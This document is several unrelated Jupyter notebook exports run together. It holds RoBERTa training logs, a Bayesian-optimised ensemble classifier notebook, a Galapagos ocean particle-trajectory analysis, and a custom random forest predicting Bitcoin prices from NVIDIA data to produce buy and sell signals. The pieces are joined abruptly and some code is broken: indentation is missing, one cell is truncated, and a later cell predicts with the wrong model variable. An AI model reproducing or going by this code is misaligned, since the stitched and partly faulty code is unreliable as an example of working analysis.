672/672 - 173s - loss: 3.8072 - tf_op_layer_Squeeze_4_loss: 1.9111 - tf_op_layer_Squeeze_5_loss: 1.8961 - val_loss: 3.7857 - val_tf_op_layer_Squeeze_4_loss: 1.9030 - val_tf_op_layer_Squeeze_5_loss: 1.8827
Epoch 3/7
672/672 - 175s - loss: 3.7039 - tf_op_layer_Squeeze_4_loss: 1.8655 - tf_op_layer_Squeeze_5_loss: 1.8383 - val_loss: 3.7600 - val_tf_op_layer_Squeeze_4_loss: 1.8993 - val_tf_op_layer_Squeeze_5_loss: 1.8607
Epoch 4/7
672/672 - 174s - loss: 3.6497 - tf_op_layer_Squeeze_4_loss: 1.8417 - tf_op_layer_Squeeze_5_loss: 1.8080 - val_loss: 3.7594 - val_tf_op_layer_Squeeze_4_loss: 1.9010 - val_tf_op_layer_Squeeze_5_loss: 1.8584
Epoch 5/7
672/672 - 170s - loss: 3.6217 - tf_op_layer_Squeeze_4_loss: 1.8302 - tf_op_layer_Squeeze_5_loss: 1.7915 - val_loss: 3.7617 - val_tf_op_layer_Squeeze_4_loss: 1.9013 - val_tf_op_layer_Squeeze_5_loss: 1.8604
Epoch 6/7
672/672 - 174s - loss: 3.6217 - tf_op_layer_Squeeze_4_loss: 1.8294 - tf_op_layer_Squeeze_5_loss: 1.7923 - val_loss: 3.7593 - val_tf_op_layer_Squeeze_4_loss: 1.9009 - val_tf_op_layer_Squeeze_5_loss: 1.8584
Epoch 7/7
672/672 - 170s - loss: 3.6107 - tf_op_layer_Squeeze_4_loss: 1.8222 - tf_op_layer_Squeeze_5_loss: 1.7885 - val_loss: 3.7632 - val_tf_op_layer_Squeeze_4_loss: 1.9040 - val_tf_op_layer_Squeeze_5_loss: 1.8592
FOLD: 4
Epoch 1/7
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
672/672 - 174s - loss: 4.6672 - tf_op_layer_Squeeze_6_loss: 2.3056 - tf_op_layer_Squeeze_7_loss: 2.3616 - val_loss: 3.8042 - val_tf_op_layer_Squeeze_6_loss: 1.9207 - val_tf_op_layer_Squeeze_7_loss: 1.8834
Epoch 2/7
672/672 - 174s - loss: 3.7749 - tf_op_layer_Squeeze_6_loss: 1.9107 - tf_op_layer_Squeeze_7_loss: 1.8642 - val_loss: 3.7413 - val_tf_op_layer_Squeeze_6_loss: 1.8894 - val_tf_op_layer_Squeeze_7_loss: 1.8518
Epoch 3/7
672/672 - 170s - loss: 3.6672 - tf_op_layer_Squeeze_6_loss: 1.8545 - tf_op_layer_Squeeze_7_loss: 1.8127 - val_loss: 3.7421 - val_tf_op_layer_Squeeze_6_loss: 1.8898 - val_tf_op_layer_Squeeze_7_loss: 1.8522
Epoch 4/7
672/672 - 174s - loss: 3.6221 - tf_op_layer_Squeeze_6_loss: 1.8365 - tf_op_layer_Squeeze_7_loss: 1.7856 - val_loss: 3.7413 - val_tf_op_layer_Squeeze_6_loss: 1.8894 - val_tf_op_layer_Squeeze_7_loss: 1.8519
Epoch 5/7
672/672 - 170s - loss: 3.6030 - tf_op_layer_Squeeze_6_loss: 1.8240 - tf_op_layer_Squeeze_7_loss: 1.7790 - val_loss: 3.7476 - val_tf_op_layer_Squeeze_6_loss: 1.8927 - val_tf_op_layer_Squeeze_7_loss: 1.8549
Epoch 6/7
Restoring model weights from the end of the best epoch.
672/672 - 170s - loss: 3.5930 - tf_op_layer_Squeeze_6_loss: 1.8208 - tf_op_layer_Squeeze_7_loss: 1.7722 - val_loss: 3.7442 - val_tf_op_layer_Squeeze_6_loss: 1.8918 - val_tf_op_layer_Squeeze_7_loss: 1.8524
Epoch 00006: early stopping
FOLD: 5
Epoch 1/7
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
WARNING:tensorflow:Gradients do not exist for variables ['base_model/roberta/pooler/dense/kernel:0', 'base_model/roberta/pooler/dense/bias:0'] when minimizing the loss.
672/672 - 174s - loss: 4.6296 - tf_op_layer_Squeeze_8_loss: 2.2781 - tf_op_layer_Squeeze_9_loss: 2.3515 - val_loss: 3.8736 - val_tf_op_layer_Squeeze_8_loss: 1.9447 - val_tf_op_layer_Squeeze_9_loss: 1.9289
Epoch 2/7
672/672 - 174s - loss: 3.8388 - tf_op_layer_Squeeze_8_loss: 1.9216 - tf_op_layer_Squeeze_9_loss: 1.9172 - val_loss: 3.7991 - val_tf_op_layer_Squeeze_8_loss: 1.8955 - val_tf_op_layer_Squeeze_9_loss: 1.9036
Epoch 3/7
672/672 - 174s - loss: 3.7222 - tf_op_layer_Squeeze_8_loss: 1.8760 - tf_op_layer_Squeeze_9_loss: 1.8462 - val_loss: 3.7759 - val_tf_op_layer_Squeeze_8_loss: 1.8970 - val_tf_op_layer_Squeeze_9_loss: 1.8788
Epoch 4/7
672/672 - 174s - loss: 3.6699 - tf_op_layer_Squeeze_8_loss: 1.8534 - tf_op_layer_Squeeze_9_loss: 1.8165 - val_loss: 3.7650 - val_tf_op_layer_Squeeze_8_loss: 1.8943 - val_tf_op_layer_Squeeze_9_loss: 1.8707
Epoch 5/7
672/672 - 174s - loss: 3.6539 - tf_op_layer_Squeeze_8_loss: 1.8482 - tf_op_layer_Squeeze_9_loss: 1.8056 - val_loss: 3.7601 - val_tf_op_layer_Squeeze_8_loss: 1.8913 - val_tf_op_layer_Squeeze_9_loss: 1.8688
Epoch 6/7
672/672 - 174s - loss: 3.6391 - tf_op_layer_Squeeze_8_loss: 1.8402 - tf_op_layer_Squeeze_9_loss: 1.7990 - val_loss: 3.7598 - val_tf_op_layer_Squeeze_8_loss: 1.8908 - val_tf_op_layer_Squeeze_9_loss: 1.8689
Epoch 7/7
672/672 - 170s - loss: 3.6387 - tf_op_layer_Squeeze_8_loss: 1.8385 - tf_op_layer_Squeeze_9_loss: 1.8002 - val_loss: 3.7620 - val_tf_op_layer_Squeeze_8_loss: 1.8924 - val_tf_op_layer_Squeeze_9_loss: 1.8696
###Markdown
Model loss graph
###Code
#@title
for n_fold in range(config['N_FOLDS']):
print('Fold: %d' % (n_fold+1))
plot_metrics(history_list[n_fold])
###Output
Fold: 1
###Markdown
Model evaluation
###Code
#@title
display(evaluate_model_kfold(k_fold, config['N_FOLDS']).style.applymap(color_map))
###Output
_____no_output_____
###Markdown
Visualize predictions
###Code
#@title
k_fold['jaccard_mean'] = 0
for n in range(config['N_FOLDS']):
k_fold['jaccard_mean'] += k_fold[f'jaccard_fold_{n+1}'] / config['N_FOLDS']
display(k_fold[['text', 'selected_text', 'sentiment', 'text_tokenCnt',
'selected_text_tokenCnt', 'jaccard', 'jaccard_mean'] + [c for c in k_fold.columns if (c.startswith('prediction_fold'))]].head(15))
###Output
_____no_output_____ |
black_box_optimization/Ensemble_Methods .ipynb | ###Markdown
Using a Decision Tree Classifier
###Code
def func(x,y):
estimator = DecisionTreeClassifier(max_depth= int(np.round(x)))
clf = BaggingClassifier(base_estimator=estimator, n_estimators= int(np.round(y)))
clf = clf.fit(x_train, y_train)
yhat = clf.predict(x_test)
MSE = mean_squared_error(y_test, yhat)
acc = accuracy_score(y_test, yhat)
return acc
xmin = 1
xmax = 50
ymin = 1
ymax = 50
pbounds = {'x': (xmin, xmax), 'y': (ymin, ymax)}
optimizer = BayesianOptimization(f=func, pbounds=pbounds, verbose=3)
optimizer.maximize(init_points = 20, n_iter = 30)
best_params = optimizer.max["params"]
found_x = best_params['x']
found_y = best_params['y']
max_value = func(found_x, found_y)
print("Found x: {}, f: {}".format(found_x, (func(found_x, found_y))))
print("Found y: {}, f: {}".format(found_y, (func(found_x, found_y))))
print("Max value found is: {}".format(max_value))
estimator = DecisionTreeClassifier(max_depth=int(np.round(found_x)))
clf = BaggingClassifier(base_estimator=estimator, n_estimators= int(np.round(found_y)))
clf = clf.fit(x_train, y_train)
yhat = clf.predict(x_test)
MSE = mean_squared_error(y_test, yhat)
acc = accuracy_score(y_test, yhat)
acc
x = np.array([1,0,0.4,0]).reshape(1,-1)
x
a = clf.predict(x)
category = int(a[0])
if category == 1:
    pass  # the cell is truncated here; the intended branch body is not recoverable
###Output
_____no_output_____
###Markdown
Using a Random Forest Classifier
###Code
def func(x,y):
rfr = RandomForestClassifier(max_depth = int(np.round(x)), n_estimators = int(np.round(y)), max_features = 4)
rfr = rfr.fit(x_train, y_train.flatten())
yhat = rfr.predict(x_test)
MSE = mean_squared_error(y_test, yhat)
acc = accuracy_score(y_test, yhat)
return acc
from bayes_opt import BayesianOptimization
xmin = 1
xmax = 100
ymin = 1
ymax = 100
pbounds = {'x': (xmin, xmax), 'y': (ymin, ymax)}
optimizer = BayesianOptimization(f=func, pbounds=pbounds, verbose=4)
optimizer.maximize(init_points = 20, n_iter = 30)
best_params = optimizer.max["params"]
found_x = best_params['x']
found_y = best_params['y']
max_value = func(found_x, found_y)
print("Found x: {}, f: {}".format(found_x, (func(found_x, found_y))))
print("Found y: {}, f: {}".format(found_y, (func(found_x, found_y))))
print("Max value found is: {}".format(max_value))
rfr = RandomForestClassifier(max_depth = int(np.round(found_x)), n_estimators = int(np.round(found_y)), max_features = 4)
rfr = rfr.fit(x_train, y_train.flatten())
yhat = rfr.predict(x_test)
MSE = mean_squared_error(y_test, yhat)
acc = accuracy_score(y_test, yhat)
acc
###Output
_____no_output_____
###Markdown
Using a Gradient Boosting Classifier

    def func(x, y):
        gbr = GradientBoostingClassifier(n_estimators=int(np.round(x)), max_depth=int(np.round(y)), learning_rate=0.1)
        gbr = gbr.fit(x_train, y_train.flatten())
        yhat = gbr.predict(x_test)
        MSE = mean_squared_error(y_test, yhat)
        acc = accuracy_score(y_test, yhat)
        return acc

    xmin = 1
    xmax = 50
    ymin = 1
    ymax = 50
    pbounds = {'x': (xmin, xmax), 'y': (ymin, ymax)}
    optimizer = BayesianOptimization(f=func, pbounds=pbounds, verbose=3)
    optimizer.maximize(init_points=20, n_iter=30)

    best_params = optimizer.max["params"]
    found_x = best_params['x']
    found_y = best_params['y']
    max_value = func(found_x, found_y)

    print("Found x: {}, f: {}".format(found_x, (func(found_x, found_y))))
    print("Found y: {}, f: {}".format(found_y, (func(found_x, found_y))))
    print("Max value found is: {}".format(max_value))

    gbr = GradientBoostingClassifier(n_estimators=int(np.round(found_x)), max_depth=int(np.round(found_y)), learning_rate=0.1)
    gbr = gbr.fit(x_train, y_train.flatten())
    yhat = gbr.predict(x_test)
    MSE = mean_squared_error(y_test, yhat)
    acc = accuracy_score(y_test, yhat)

Visualizing the Data This code runs the trained ensemble to generate predictions based on the number of trials, accuracy, and time per iteration
###Code
def generate_data(b):
n = 11 #Number of points per dimension. Number of trials = n^3
prediction_list = []
prediction_parameters = []
for k in range(n):
for j in range(n):
for i in range(n):
a = k/(n-1)
c = j/(n-1)
d = i/(n-1)
predict_array = np.array([a,b,c,d]).reshape(1,-1)
prediction = clf.predict(predict_array)
prediction_parameters.append([a,c,d])
prediction_list.append(prediction)
p_class = np.asarray(prediction_list)
p_parameters = np.asarray(prediction_parameters)
data = np.hstack((p_parameters, p_class))
return data
def plot_data(data, view_angle_h, view_angle_v):
cols = ['Trials', 'Accuracy', 'Time', 'Class']
df = pd.DataFrame(data, columns = cols)
class_0_data = np.asarray(df[df['Class'] == 0.])
class_1_data = np.asarray(df[df['Class'] == 1.])
class_2_data = np.asarray(df[df['Class'] == 2.])
class_3_data = np.asarray(df[df['Class'] == 3.])
plt.close()
fig = plt.subplots(figsize=(15,10))
ax = plt.axes(projection='3d')
xline_0 = class_0_data[:,0]
yline_0 = class_0_data[:,1]
zline_0 = class_0_data[:,2]
ax.scatter3D(xline_0, yline_0, zline_0, color = 'b', marker='o', s=300, alpha = 0.25, label = 'CmaEs')
xline_1 = class_1_data[:,0]
yline_1 = class_1_data[:,1]
zline_1 = class_1_data[:,2]
ax.scatter3D(xline_1, yline_1, zline_1, color = 'y', marker='o', s=300, alpha = 0.25, label = 'Random')
xline_2 = class_2_data[:,0]
yline_2 = class_2_data[:,1]
zline_2 = class_2_data[:,2]
ax.scatter3D(xline_2, yline_2, zline_2, color = 'g', marker='o', s =300, alpha = 0.25, label = 'TPE')
xline_3 = class_3_data[:,0]
yline_3 = class_3_data[:,1]
zline_3 = class_3_data[:,2]
ax.scatter3D(xline_3, yline_3, zline_3, color = 'r', marker='o', s=300, alpha = 0.25, label = 'Bayes')
plt.legend(loc = 'upper right')
ax.set_xlabel('Number of Trials')
ax.set_ylabel('Accuracy')
ax.set_zlabel('Time per Iteration')
ax.view_init(elev= view_angle_v, azim=view_angle_h)
plt.show()
data_0 = generate_data(0)
data_1 = generate_data(1)
%matplotlib inline
def update(Rotate_View_h=0, Rotate_View_v=0, N_of_Params=0):
if N_of_Params == 0:
plot_data(data_0, Rotate_View_h, Rotate_View_v)
else:
plot_data(data_1, Rotate_View_h, Rotate_View_v)
interact(update, Rotate_View_h = (40,360,20), Rotate_View_v = (10,360,20), N_of_Params = (0,1,1))
###Output
_____no_output_____
###Markdown
Importing from python file
###Code
from ensemble_methods import decision_tree_classifier
decision_tree_classifier(1,1,1,1)
###Output
| iter | target | x | y |
-------------------------------------------------
| [0m 1 [0m | [0m 0.6373 [0m | [0m 38.72 [0m | [0m 20.01 [0m |
| [0m 2 [0m | [0m 0.6373 [0m | [0m 12.35 [0m | [0m 19.79 [0m |
| [95m 3 [0m | [95m 0.6453 [0m | [95m 20.32 [0m | [95m 41.13 [0m |
| [0m 4 [0m | [0m 0.6373 [0m | [0m 15.39 [0m | [0m 15.38 [0m |
| [0m 5 [0m | [0m 0.584 [0m | [0m 5.209 [0m | [0m 12.31 [0m |
| [0m 6 [0m | [0m 0.64 [0m | [0m 36.58 [0m | [0m 12.46 [0m |
| [95m 7 [0m | [95m 0.648 [0m | [95m 27.65 [0m | [95m 46.55 [0m |
| [0m 8 [0m | [0m 0.6267 [0m | [0m 17.44 [0m | [0m 12.37 [0m |
| [0m 9 [0m | [0m 0.6427 [0m | [0m 29.87 [0m | [0m 13.75 [0m |
| [95m 10 [0m | [95m 0.6533 [0m | [95m 43.78 [0m | [95m 39.97 [0m |
| [0m 11 [0m | [0m 0.64 [0m | [0m 27.19 [0m | [0m 32.74 [0m |
| [0m 12 [0m | [0m 0.648 [0m | [0m 48.29 [0m | [0m 40.94 [0m |
| [0m 13 [0m | [0m 0.6453 [0m | [0m 35.69 [0m | [0m 28.48 [0m |
| [0m 14 [0m | [0m 0.6373 [0m | [0m 30.0 [0m | [0m 22.34 [0m |
| [0m 15 [0m | [0m 0.5893 [0m | [0m 27.73 [0m | [0m 2.305 [0m |
| [0m 16 [0m | [0m 0.6427 [0m | [0m 48.44 [0m | [0m 32.52 [0m |
| [95m 17 [0m | [95m 0.656 [0m | [95m 23.12 [0m | [95m 33.67 [0m |
| [0m 18 [0m | [0m 0.6453 [0m | [0m 35.38 [0m | [0m 26.8 [0m |
| [0m 19 [0m | [0m 0.6267 [0m | [0m 25.33 [0m | [0m 5.286 [0m |
| [95m 20 [0m | [95m 0.6613 [0m | [95m 17.5 [0m | [95m 4.131 [0m |
| [0m 21 [0m | [0m 0.5947 [0m | [0m 14.45 [0m | [0m 1.0 [0m |
| [0m 22 [0m | [0m 0.6213 [0m | [0m 19.14 [0m | [0m 5.285 [0m |
| [0m 23 [0m | [0m 0.632 [0m | [0m 17.71 [0m | [0m 3.731 [0m |
| [0m 24 [0m | [0m 0.648 [0m | [0m 12.36 [0m | [0m 19.77 [0m |
| [0m 25 [0m | [0m 0.6507 [0m | [0m 12.06 [0m | [0m 40.35 [0m |
| [0m 26 [0m | [0m 0.6533 [0m | [0m 12.33 [0m | [0m 19.75 [0m |
| [0m 27 [0m | [0m 0.624 [0m | [0m 42.42 [0m | [0m 3.057 [0m |
| [0m 28 [0m | [0m 0.6427 [0m | [0m 31.76 [0m | [0m 23.56 [0m |
| [0m 29 [0m | [0m 0.6453 [0m | [0m 23.03 [0m | [0m 33.64 [0m |
| [0m 30 [0m | [0m 0.656 [0m | [0m 34.61 [0m | [0m 12.4 [0m |
| [0m 31 [0m | [0m 0.632 [0m | [0m 34.57 [0m | [0m 12.28 [0m |
| [0m 32 [0m | [0m 0.5893 [0m | [0m 2.784 [0m | [0m 29.29 [0m |
| [0m 33 [0m | [0m 0.632 [0m | [0m 35.28 [0m | [0m 26.92 [0m |
| [0m 34 [0m | [0m 0.6427 [0m | [0m 12.01 [0m | [0m 40.24 [0m |
| [0m 35 [0m | [0m 0.6533 [0m | [0m 12.29 [0m | [0m 19.63 [0m |
| [95m 36 [0m | [95m 0.6667 [0m | [95m 11.9 [0m | [95m 40.36 [0m |
| [0m 37 [0m | [0m 0.6267 [0m | [0m 28.26 [0m | [0m 37.71 [0m |
| [0m 38 [0m | [0m 0.6533 [0m | [0m 35.36 [0m | [0m 35.97 [0m |
| [0m 39 [0m | [0m 0.6533 [0m | [0m 9.661 [0m | [0m 20.17 [0m |
| [0m 40 [0m | [0m 0.6373 [0m | [0m 36.9 [0m | [0m 46.55 [0m |
| [95m 41 [0m | [95m 0.6747 [0m | [95m 9.579 [0m | [95m 20.27 [0m |
| [0m 42 [0m | [0m 0.6453 [0m | [0m 8.518 [0m | [0m 22.51 [0m |
| [0m 43 [0m | [0m 0.656 [0m | [0m 12.4 [0m | [0m 19.68 [0m |
| [0m 44 [0m | [0m 0.6267 [0m | [0m 17.64 [0m | [0m 4.263 [0m |
| [0m 45 [0m | [0m 0.6453 [0m | [0m 37.32 [0m | [0m 35.87 [0m |
| [0m 46 [0m | [0m 0.6347 [0m | [0m 9.737 [0m | [0m 20.28 [0m |
| [0m 47 [0m | [0m 0.648 [0m | [0m 21.03 [0m | [0m 35.33 [0m |
| [0m 48 [0m | [0m 0.6507 [0m | [0m 23.16 [0m | [0m 33.76 [0m |
| [0m 49 [0m | [0m 0.544 [0m | [0m 2.173 [0m | [0m 10.88 [0m |
| [0m 50 [0m | [0m 0.5787 [0m | [0m 4.754 [0m | [0m 2.528 [0m |
=================================================
Found x: 9.579322837783078, f: 0.6533333333333333
Found y: 20.265925909485215, f: 0.6533333333333333
Max value found is: 0.656
|
scripts/analysis/Parcels_analysis_4km_bwd.ipynb | ###Markdown
old
###Code
#find which particles arrived at the Galapagos islands
Traj['traveltime'] = [] #age at arrival
Traj['visittime'] = [] #date of arrival
Traj['pvisited'] = [] #index particle
Traj['tvisited'] = [] #index time
for p in range(Traj['visitedgalapagos'].shape[0]): # loop through particles
if np.any(Traj['visitedgalapagos'][p, :] == 1): # check whether visited Galapagos
        I = np.where(Traj['visitedgalapagos'][p, :] == 1)[0][0] # find the first time index at which it visited Galapagos
Traj['traveltime'].append(Traj['age'][p, I]/86400.)
Traj['visittime'].append(Traj['time'][p,I])
Traj['pvisited'].append(p)
Traj['tvisited'].append(I)
#individual trajectories that reach Galapagos extent
plat = Traj['lat'][Traj['pvisited'],:]
plon = Traj['lon'][Traj['pvisited'],:]
map_extent = [-180,-70,-30,30]
PlotTrajectories(plon,plat,map_extent)
plt.savefig('../results/figures/TrajAmerica')
#2D histogram from start to arrival
projection = cartopy.crs.PlateCarree(central_longitude=0)
fig, ax = plt.subplots(subplot_kw={'projection': projection}, figsize=(7,7))
grd = ax.gridlines(draw_labels=True,
color='gray',
alpha=0.5,
linestyle='--')
grd.xlabels_top = False
grd.ylabels_right = False
grd.xlabel_style = {'size': 15, 'color': 'black'}
grd.ylabel_style = {'size': 15, 'color': 'black'}
ax.coastlines()
ax.add_feature(cartopy.feature.LAND, facecolor=(160/255, 160/255, 160/255))
ax.set_extent([-130,-60,-25,30])
bins = [np.arange(-130,-60, 1), np.arange(-25, 30, 1)]
temp = Traj['lon'][Traj['pvisited'],:]
plon = np.copy(temp)
temp = Traj['lat'][Traj['pvisited'],:]
plat = np.copy(temp)
for i, t in enumerate(Traj['tvisited']):
    plon[i,t:] = np.nan
    plat[i,t:] = np.nan
H, xe, ye = np.histogram2d(plon[~np.isnan(plon)], plat[~np.isnan(plat)], bins=bins)
H[0,: ] = H[-1, :]
xb = (xe[1:] + xe[:-1])/2
yb = (ye[1:] + ye[:-1])/2
levels = [10**x for x in range(0, 9)]
co = ax.contourf(xb, yb, H.T, levels=levels, norm=colors.LogNorm())
###Output
_____no_output_____
###Markdown
Practice plotting Subplots
###Code
%matplotlib inline
T = D['bwd_v2']
plat = T['lat']
plon = T['lon']
ptime = T['time']
projection = cartopy.crs.PlateCarree(central_longitude=0)
fig, ax = plt.subplots(1, 2, subplot_kw={'projection': projection}, figsize=(15,15))
for i in range (len(ax)):
grd = ax[i].gridlines(draw_labels=True,
color='gray',
alpha=0.5,
linestyle='--')
grd.xlabels_top = False
grd.ylabels_right = False
if i==1:
grd.ylabels_left = False
grd.xlabel_style = {'size': 15, 'color': 'black'}
grd.ylabel_style = {'size': 15, 'color': 'black'}
ax[i].coastlines()
ax[i].add_feature(cartopy.feature.LAND, facecolor=(160/255, 160/255, 160/255))
ax[i].set_extent([-110, -70, -20, 30])
particles = np.arange(1,300)
for particle in particles:
ax[0].plot(plon[particle,:], plat[particle,:],
linewidth=1,
color='r')
particles = np.arange(40000,40200)
for particle in particles:
ax[1].plot(plon[particle,:],plat[particle,:])
#plt.show()
###Output
_____no_output_____ |
DataScience_FinalProject/Random Forrest & Kalman Filter.ipynb | ###Markdown
Random Forrest Framework
###Code
class RandomForest():
def __init__(self, x, y, n_trees, n_features, sample_sz, depth=10, min_leaf=5):
np.random.seed(12)
if n_features == 'sqrt':
self.n_features = int(np.sqrt(x.shape[1]))
elif n_features == 'log2':
self.n_features = int(np.log2(x.shape[1]))
else:
self.n_features = n_features
# print(self.n_features, "sha: ",x.shape[1])
self.x, self.y, self.sample_sz, self.depth, self.min_leaf = x, y, sample_sz, depth, min_leaf
self.trees = [self.create_tree() for i in range(n_trees)]
def create_tree(self):
idxs = np.random.permutation(len(self.y))[:self.sample_sz]
f_idxs = np.random.permutation(self.x.shape[1])[:self.n_features]
return DecisionTree(self.x.iloc[idxs], self.y[idxs], self.n_features, f_idxs,
idxs=np.array(range(self.sample_sz)),depth = self.depth, min_leaf=self.min_leaf)
def predict(self, x):
return np.mean([t.predict(x) for t in self.trees], axis=0)
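# standard deviation from running count, sum, and sum of squares: sqrt(E[x^2] - (E[x])^2)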
def std_agg(cnt, s1, s2): return math.sqrt((s2/cnt) - (s1/cnt)**2)
class DecisionTree():
def __init__(self, x, y, n_features, f_idxs,idxs,depth=10, min_leaf=5):
self.x, self.y, self.idxs, self.min_leaf, self.f_idxs = x, y, idxs, min_leaf, f_idxs
self.depth = depth
# print(f_idxs)
# print(self.depth)
self.n_features = n_features
self.n, self.c = len(idxs), x.shape[1]
self.val = np.mean(y[idxs])
self.score = float('inf')
self.find_varsplit()
def find_varsplit(self):
for i in self.f_idxs: self.find_better_split(i)
if self.is_leaf: return
x = self.split_col
lhs = np.nonzero(x<=self.split)[0]
rhs = np.nonzero(x>self.split)[0]
lf_idxs = np.random.permutation(self.x.shape[1])[:self.n_features]
rf_idxs = np.random.permutation(self.x.shape[1])[:self.n_features]
self.lhs = DecisionTree(self.x, self.y, self.n_features, lf_idxs, self.idxs[lhs], depth=self.depth-1, min_leaf=self.min_leaf)
self.rhs = DecisionTree(self.x, self.y, self.n_features, rf_idxs, self.idxs[rhs], depth=self.depth-1, min_leaf=self.min_leaf)
def find_better_split(self, var_idx):
x, y = self.x.values[self.idxs,var_idx], self.y[self.idxs]
sort_idx = np.argsort(x)
sort_y,sort_x = y[sort_idx], x[sort_idx]
rhs_cnt,rhs_sum,rhs_sum2 = self.n, sort_y.sum(), (sort_y**2).sum()
lhs_cnt,lhs_sum,lhs_sum2 = 0,0.,0.
for i in range(0,self.n-self.min_leaf-1):
xi,yi = sort_x[i],sort_y[i]
lhs_cnt += 1; rhs_cnt -= 1
lhs_sum += yi; rhs_sum -= yi
lhs_sum2 += yi**2; rhs_sum2 -= yi**2
if i<self.min_leaf or xi==sort_x[i+1]:
continue
lhs_std = std_agg(lhs_cnt, lhs_sum, lhs_sum2)
rhs_std = std_agg(rhs_cnt, rhs_sum, rhs_sum2)
curr_score = lhs_std*lhs_cnt + rhs_std*rhs_cnt
if curr_score<self.score:
self.var_idx,self.score,self.split = var_idx,curr_score,xi
@property
def split_name(self): return self.x.columns[self.var_idx]
@property
def split_col(self): return self.x.values[self.idxs,self.var_idx]
@property
def is_leaf(self): return self.score == float('inf') or self.depth <= 0
def predict(self, x):
return np.array([self.predict_row(xi) for xi in x])
def predict_row(self, xi):
if self.is_leaf: return self.val
t = self.lhs if xi[self.var_idx]<=self.split else self.rhs
return t.predict_row(xi)
import math
import pandas as pd
from pandas import DatetimeIndex
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.dates as mdates
import seaborn as sns
sns.set(style='darkgrid', context='talk', palette='Dark2')
my_year_month_fmt = mdates.DateFormatter('%m/%y')
plt.rcParams['figure.figsize'] = (15, 9)
%matplotlib inline
bitcoin_df = pd.read_excel("CRYPTOCURRENCY/BITCOIN.xlsx")
nvdia_df = pd.read_excel("CRYPTOCURRENCY/NVDA.xlsx")
nvdia_df.head()
###Output
_____no_output_____
###Markdown
Create Date as index
###Code
bitcoin_df.index=DatetimeIndex(bitcoin_df['Date'])
nvdia_df.index=DatetimeIndex(nvdia_df['Date'])
###Output
_____no_output_____
###Markdown
Join NVD and Bitcoin datasets
###Code
X = bitcoin_df.join(nvdia_df,rsuffix='_nvida')
X["Bitcoin_Price"] = (2*bitcoin_df.High + bitcoin_df.Low + bitcoin_df.Close)/4
X.drop(columns=['Date', 'Open', 'High', 'Low', 'Close','Date_nvida', 'Open ', 'Close ', 'High ', 'Low ','Market Cap'],inplace=True)
X.columns = ['bitcoin_volume','nvd_volume','nvd_price','bitcoin_price']
X.drop(X[X.bitcoin_volume.isnull()].index,inplace=True)
X.drop(X[X.bitcoin_volume == '-'].index,inplace=True)
###Output
_____no_output_____
###Markdown
Since there are missing values on weekends and holidays, I backfill the NVIDIA values
###Code
X['nvd_price'].fillna(method='bfill',inplace=True)
X['nvd_volume'].fillna(method='bfill',inplace=True)
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(16,9))
ax1.plot(X.index,X['bitcoin_price'])
ax1.set_ylabel("Bitcoin Price")
ax2.plot(X.index,X['nvd_price'])
ax2.set_ylabel("Nvidia Price")
###Output
_____no_output_____
###Markdown
Set bitcoin price as the y
###Code
y = X.bitcoin_price
X.drop(['bitcoin_price'],inplace = True,axis=1)
###Output
_____no_output_____
###Markdown
Create the Random Forest structure
###Code
rf = RandomForest(x=X,y=y,n_trees=20,n_features=4,sample_sz=500)
tree = rf.create_tree()
y_pred = rf.predict(X.tail(365).values)
###Output
_____no_output_____
###Markdown
Comparing predicted values for the last year with actual prices. The prediction follows a trend similar to the actual values.
###Code
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(16,9))
ax1.plot(X.tail(365).index,y_pred,label="Predicted bitcoin price in USD")
ax1.set_ylabel("Predictions")
ax2.set_ylabel("Actual")
ax1.legend(loc='best')
ax2.plot(X.tail(365).index,y.tail(365),label="Actual bitcoin prices")
ax2.legend(loc='best')
###Output
_____no_output_____
###Markdown
The daily data is noisy and fluctuates a lot, so I tried a moving average
###Code
ema_short = X.ewm(span=7, adjust=False).mean()
y_short = y.ewm(span=7, adjust=False).mean()
rf2 = RandomForest(x=ema_short,y=y_short,n_trees=20,n_features=4,sample_sz=500)
rf2.create_tree()
# Predict with the forest trained on the smoothed data (rf2, not rf)
y_pred_short = rf2.predict(ema_short.tail(365).values)
###Output
_____no_output_____
###Markdown
The fluctuations are much less noisy than the daily predictions, and the result seems more accurate
###Code
fig, (ax1, ax2) = plt.subplots(2, 1, figsize=(16,9))
ax1.plot(ema_short.tail(365).index,y_pred_short,label="prediction")
ax2.plot(X.tail(365).index,y_short.tail(365),label="actual")
ax1.set_ylabel("Predictions")
ax2.set_ylabel("Actual")
ax1.legend(loc='best')
ax2.legend(loc='best')
# Trading signal: the sign of the day-over-day change in the predicted price
trading_signal_week = pd.DataFrame(np.sign(np.diff(y_pred_short)),index=X.tail(364).index,columns=["signal"])
trading_signal_week.head()
# Shift by one day so each trade only uses the previous day's prediction
trading_signal_week = trading_signal_week.shift(1)
fig, (ax2) = plt.subplots(1, 1, figsize=(16,9))
duration = 120
y_temp = pd.DataFrame(y_short.tail(duration),index =X.tail(duration).index)
ax2.plot(X.tail(duration).index,y.tail(duration),label="Bitcoin Price")
ax2.set_ylabel("Actual Price for last 120 days")
ax2.legend(loc='best')
# Plot the buy signals
ax2.plot(trading_signal_week.tail(duration).loc[trading_signal_week.signal == 1.0].index,
y.tail(duration)[trading_signal_week.signal == 1.0],'^', markersize=10, color='m')
# Plot the sell signals
ax2.plot(trading_signal_week.tail(duration).loc[trading_signal_week.signal == -1.0].tail(duration).index,
y.tail(duration)[trading_signal_week.signal == -1.0],'v', markersize=10, color='r')
###Output
_____no_output_____
###Markdown
